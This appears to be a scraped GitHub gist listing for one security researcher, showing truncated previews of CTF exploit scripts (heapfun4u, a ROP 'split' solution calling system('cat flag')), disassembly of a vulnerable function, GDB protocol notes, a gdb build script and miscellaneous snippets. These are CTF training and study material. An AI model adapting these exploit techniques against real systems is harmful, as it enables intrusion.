[*] './heapfun4u'
Arch: amd64-64-little
RELRO: Partial RELRO
Zach Riggle zachriggle
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import scapy, struct, socket, binascii, logging | |
| from scapy.all import * | |
| from collections import defaultdict | |
| # | |
| # Entry | |
| # | |
| def USBIP(PacketData): | |
| if PacketData[:2] == '\x01\x11': |
zachriggle
/ README.md
Last active
May 25, 2016 07:20
DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit
zachriggle
/ README.md
Last active
June 15, 2016 02:51
The write-up is basically the exploit.
zachriggle
/ win2.py
Last active
June 21, 2016 00:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # Here's the disassembly for everything | |
| """ | |
| 0804844b <vulnerable_function>: | |
| 804844b: 55 push ebp | |
| 804844c: 89 e5 mov ebp,esp | |
| 804844e: 81 ec 88 00 00 00 sub esp,0x88 | |
| 8048454: 83 ec 04 sub esp,0x4 | |
| 8048457: 68 00 01 00 00 push 0x100 |
zachriggle
/ keybase.md
Created
September 15, 2016 22:36
I hereby claim:
- I am zachriggle on github.
- I am zachriggle (https://keybase.io/zachriggle) on keybase.
- I have a public key ASBYNpGGwzmRUnRb5-fg2Qy7jdirdXG-ECeIbGP_Lv72oQo
To claim this, I am signing this object:
Lots of commands in GDB's protocol use hex-encoded data. A $ starts a packet, and all packets end with # followed by a one-byte, hex-encoded checksum.
Let's look at the protocol for the request:
remote get /proc/self/cmdline ./cmdline
Which should fetch /proc/self/cmdline and dump it to ./cmdline. It does!
$ phd cmdline
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| # Set up pwntools to work with this binary | |
| elf = context.binary = ELF('split') | |
| # We need to invoke system("cat flag"), which requires knowing the | |
| # location of both the function 'system' as well as the string 'cat flag'. | |
| system = elf.symbols.system | |
| cat_flag = elf.search("cat flag").next() |
zachriggle
/ gdb-python2.7-ubuntu.sh
Created
October 16, 2014 22:35
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apt-get install python2.7-dev python2.7 | |
| apt-get build-dep gdb | |
| apt-get source gdb | |
| sed -i -E "s|python3|/usr/bin/python2.7|" debian/rules | |
| dpkg-buildpackage -uc -us -j8 | |
| dpkg-install ../*.deb |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RARVM reversible/patchme | |
| Modified 'unrar' source to dump context and disassembly. | |
| Wrote two separate solvers since the challenge was broken. | |
| To build the disassembler/debugger: | |
| - unzip unrar-src-disassembler.zip -d unrar | |
| - cd unrar |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #if 0 | |
| .PHONY: run | |
| run: a.out | |
| @./a.out | |
| a.out: $(MAKEFILE_LIST) | |
| @gcc -xc $(MAKEFILE_LIST) | |
| ifeq (0, 1) | |
| #endif |